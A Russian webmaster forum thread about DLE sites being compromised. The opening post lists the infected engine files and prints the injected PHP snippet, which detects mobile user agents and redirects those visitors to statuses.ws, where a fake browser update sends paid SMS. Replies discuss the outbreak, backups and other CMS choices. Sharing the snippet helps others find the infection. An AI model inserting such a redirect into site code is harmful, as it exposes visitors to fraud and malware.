DLE редирект на statuses.ws

12
Robinzonchik
На сайте с 14.07.2010
Offline
55
4651

При заходе с телефона на сайт редиректил на скачивание "обновления для браузера", которое отправляет смс. Давно знал о такой ерунде, но на свои сайты никогда не вешал подобный бред.

В итоге поставил диагноз: взлом.

В общем заражены были эти файлы:

/engine/data/config.php
/engine/data/dbconfig.php
/engine/init.php

Содержали вот такой кусок:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

До сих пор думаю где проглядел...:confused:

P.S.: Может быть кому-то будет полезно.

Пишу программы, сайты, сервисы, скрипты. (/ru/forum/819250)
K5
На сайте с 21.07.2010
Offline
209
#1

это у многих за последние 2 недели...

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
maximka77
На сайте с 15.10.2011
Offline
245
#2

Robinzonchik, вот такой же топик: /ru/forum/764551

- Базы чатов и каналов Телеграм ( https://base-top.ru/ ) - Недорогие ссылки с форумов (https://cutt.ly/swQDFZWx)
V
На сайте с 13.01.2013
Offline
0
#3

Всем привет! Тут поxоду всеx ломанули кто на dle

У меня таже проблема произошла так что я думаю движок надо менять так как это не дело

planetapokera
На сайте с 08.02.2009
Offline
169
#4

У меня тоже было что-то подобное... Кроме как удалить вирусный код, вариантов нет пока... Не пойдешь же писать в отдел К заяву... Хотя надо школяров наказывать..

K5
На сайте с 21.07.2010
Offline
209
#5
vanesik:
Всем привет!
У меня таже проблема произошла так что я думаю движок надо менять так как это не дело

менять на что? вордпресс, йоомла?

а когда их взломают куда побежите?

тем более в них дырок не меньше...

V
На сайте с 13.01.2013
Offline
0
#6
kgtu5:
менять на что? вордпресс, йоомла?
а когда их взломают куда побежите?
тем более в них дырок не меньше...

йоомла это вообще кошмар какой то .Не уж то движков больше нет не какиx с xорошой защитой

Проще тогда сайт самому написать чем подставлять пользователей вирусами на своем сайте!

Я пока избавился от этого вируса но надолго ли меня бекап всего сайта спас который я делал пару недель назад!

У меня 2 сайта один на dle а другой сам писал с нуля вот который сам писал там у меня нет проигрывателей видео и не как не знаю как его туда вставить вот единственная проблема почему Я пользуюсь dle! Вот когда сделаю что бы люди могли видео добавлять на моем сайте который сам написал тогда я уже знаю куда бежать...

Станислав
На сайте с 27.12.2009
Offline
258
#7
kgtu5:
менять на что? вордпресс, йоомла?
а когда их взломают куда побежите?
тем более в них дырок не меньше...

второе не юзал, но про вордпресс вы зря так. В Ворпрессе куда более качественный код нежели решето от DLE. DLE чем популярнее становится, тем больше дырок в ней находится.

А переехать можно на все что угодно, главное будет в том что меньше школоты будут знать о дырках в новом двиге.

Мы там, где рады нас видеть.
K5
На сайте с 21.07.2010
Offline
209
#8
Ms-Dred:

А переехать можно на все что угодно, главное будет в том что меньше школоты будут знать о дырках в новом двиге.

переехать то можно, но не факт что будет лучше:

вот хорошая тема про то (первые 2 поста в частности), как можно движки делать

/ru/forum/766476

вордпресс тоже не идеал, месяца полтора назад тоже была эпопея с ним...

перед новым годом йоомлу поломали...

во всех движках есть дырки, ничего все решаемо...

artzor
На сайте с 30.10.2008
Offline
111
#9

В index.php (корень) так же обнаружен подобный код, причем дважды подряд :(

p/s/ скрипт - лицензия, файл админки изменен ...

S
На сайте с 10.09.2011
Offline
75
#10
artzor:
В index.php (корень) так же обнаружен подобный код, причем дважды подряд :(

p/s/ скрипт - лицензия, файл админки изменен ...

какие модули, хаки ставили? шаблон паблик? имхо проблема именно в этом 😒

......
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий